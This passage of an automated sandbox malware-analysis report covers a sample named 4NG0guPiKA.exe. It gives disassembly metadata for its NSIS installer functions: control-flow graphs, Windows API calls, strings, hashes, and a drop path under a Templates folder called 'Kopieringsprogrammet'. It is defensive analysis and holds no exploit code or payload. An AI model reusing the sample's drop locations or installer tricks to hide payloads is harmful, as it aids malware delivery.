                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                            • API String ID: 542301482-406486772
                                                                                                            • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                            • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                            • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                            • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
                                                                                                            Function 004038B4 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 246 403919-40392a call 405db7 241->246 247 40392f-403935 lstrcatW 241->247 250 40393a-403963 call 403b8a call 405a3d 242->250 246->247 247->250 256 4039f5-4039fd call 405a3d 250->256 257 403969-40396e 250->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 258 403974-40399c call 405db7 257->258 258->256 268 40399e-4039a2 258->268 266 403ab1-403ab9 call 40140b 263->266 267 403a32-403a62 RegisterClassW 263->267 264->263 281 403ac3-403ace call 403b8a 266->281 282 403abb-403abe 266->282 269 403b80 267->269 270 403a68-403aac SystemParametersInfoW CreateWindowExW 267->270 272 4039b4-4039c0 lstrlenW 268->272 273 4039a4-4039b1 call 405962 268->273 278 403b82-403b89 269->278 270->266 275 4039c2-4039d0 lstrcmpiW 272->275 276 4039e8-4039f0 call 405935 call 405eea 272->276 273->272 275->276 280 4039d2-4039dc GetFileAttributesW 275->280 276->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->278 284->276 285->276 285->284 294 403af3-403af8 LoadLibraryW 291->294 295 403afa-403b0c GetClassInfoW 291->295 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 294->295 297 403b24-403b47 DialogBoxParamW call 40140b 295->297 298 403b0e-403b1e GetClassInfoW RegisterClassW 295->298 302 403b4c-403b55 call 403804 297->302 298->297 300->282 303 403b6d-403b74 call 40140b 300->303 301->269 302->278 303->282
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,774D3420,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 00403935
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 914957316-3385261710
                                                                                                            • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                            • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                            • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                            • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                            Function 00403C57 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 323 403cb6-403cbc 316->323 324 403c9e-403cb0 ShowWindow 316->324 328 403e67-403e82 318->328 320 403e24-403e2f call 401389 319->320 321 403e55-403e57 319->321 320->321 342 403e31-403e50 SendMessageW 320->342 321->318 327 4040fc 321->327 329 403cd8-403cdb 323->329 330 403cbe-403cd3 DestroyWindow 323->330 324->323 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 345 403e97-403ea2 334->345 346 4040ba-4040d3 DestroyWindow EndDialog 334->346 336->327 343 4040e1-4040e7 336->343 338->335 340 403d97-403da5 call 404196 339->340 341 403cfa-403d0b GetDlgItem 339->341 340->335 347 403d2a-403d2d 341->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 341->348 342->335 343->327 350 4040e9-4040f2 ShowWindow 343->350 345->346 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 345->351 346->336 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->340 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->340 361->356 366 403d52-403d58 call 40140b 362->366 367 403d67-403d70 call 40140b 362->367 377 403d5e 366->377 367->340 376 403d72-403d7c 367->376 376->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                            • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                            • DestroyWindow.USER32 ref: 00403CC4
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                            • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                            • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282139019-0
                                                                                                            • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                            • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                            • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                            • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                            Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 431 403013-403018 424->431 432 402f48-402f4b 424->432 427 402e63 425->427 428 402e65-402e72 call 4032f9 425->428 427->428 434 402e78-402e7e 428->434 435 402fcf-402fd7 call 402d1a 428->435 431->417 436 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 432->436 437 402f4d-402f65 call 40330f call 4032f9 432->437 438 402e80-402e98 call 405b11 434->438 439 402efe-402f02 434->439 435->431 462 402fc5-402fca 436->462 463 402fd9-403009 call 40330f call 403062 436->463 437->431 464 402f6b-402f71 437->464 448 402f0b-402f11 438->448 457 402e9a-402ea1 438->457 447 402f04-402f0a call 402d1a 439->447 439->448 447->448 449 402f13-402f21 call 406302 448->449 450 402f24-402f2e 448->450 449->450 450->424 450->425 457->448 461 402ea3-402eaa 457->461 461->448 465 402eac-402eb3 461->465 462->417 472 40300e-403011 463->472 464->431 464->436 465->448 467 402eb5-402ebc 465->467 467->448 469 402ebe-402ede 467->469 469->431 471 402ee4-402ee8 469->471 473 402ef0-402ef8 471->473 474 402eea-402eee 471->474 472->431 475 40301a-40302b 472->475 473->448 478 402efa-402efc 473->478 474->424 474->473 476 403033-403038 475->476 477 40302d 475->477 479 403039-40303f 476->479 477->476 478->448 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4NG0guPiKA.exe,00000400), ref: 00402DEC
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00402E35
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4NG0guPiKA.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-1737419005
                                                                                                            • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                            • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                            Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 609 401752-401777 call 402b3a call 4059ac 614 401781-401793 call 405eea call 405935 lstrcatW 609->614 615 401779-40177f call 405eea 609->615 620 401798-401799 call 40617e 614->620 615->620 624 40179e-4017a2 620->624 625 4017a4-4017ae call 40622d 624->625 626 4017d5-4017d8 624->626 634 4017c0-4017d2 625->634 635 4017b0-4017be CompareFileTime 625->635 627 4017e0-4017fc call 405b56 626->627 628 4017da-4017db call 405b31 626->628 636 401870-401899 call 405194 call 403062 627->636 637 4017fe-401801 627->637 628->627 634->626 635->634 651 4018a1-4018ad SetFileTime 636->651 652 40189b-40189f 636->652 638 401852-40185c call 405194 637->638 639 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 637->639 649 401865-40186b 638->649 639->624 671 401847-401848 639->671 654 4029d0 649->654 653 4018b3-4018be CloseHandle 651->653 652->651 652->653 656 4018c4-4018c7 653->656 657 4029c7-4029ca 653->657 658 4029d2-4029d6 654->658 660 4018c9-4018da call 405f0c lstrcatW 656->660 661 4018dc-4018df call 405f0c 656->661 657->654 667 4018e4-402243 call 4056c6 660->667 661->667 667->658 671->649 673 40184a-40184b 671->673 673->638
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 00401793
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 004017B8
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nso68A0.tmp$C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                            • API String ID: 1941528284-1692931589
                                                                                                            • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                            • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                            • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                            • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                            Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 675 402573-402588 call 402b1d 678 4029c7-4029ca 675->678 679 40258e-402595 675->679 682 4029d0-4029d6 678->682 680 402597 679->680 681 40259a-40259d 679->681 680->681 683 4025a3-4025b2 call 405e4a 681->683 684 4026e6-4026ee 681->684 683->684 688 4025b8 683->688 684->678 689 4025be-4025c2 688->689 690 402657-402667 call 405bd9 689->690 691 4025c8-4025e3 ReadFile 689->691 690->684 696 402669 690->696 691->684 693 4025e9-4025ee 691->693 693->684 695 4025f4-402602 693->695 697 4026a2-4026ae call 405e31 695->697 698 402608-40261a MultiByteToWideChar 695->698 699 40266c-40266f 696->699 697->682 698->696 701 40261c-40261f 698->701 699->697 703 402671-402676 699->703 702 402621-40262c 701->702 702->699 705 40262e-402653 SetFilePointer MultiByteToWideChar 702->705 706 4026b3-4026b7 703->706 707 402678-40267d 703->707 705->702 710 402655 705->710 708 4026d4-4026e0 SetFilePointer 706->708 709 4026b9-4026bd 706->709 707->706 711 40267f-402692 707->711 708->684 712 4026c5-4026d2 709->712 713 4026bf-4026c3 709->713 710->696 711->684 714 402694-40269a 711->714 712->684 713->708 713->712 714->689 715 4026a0 714->715 715->684
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                              • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 1149667376-2366072709
                                                                                                            • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                            • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
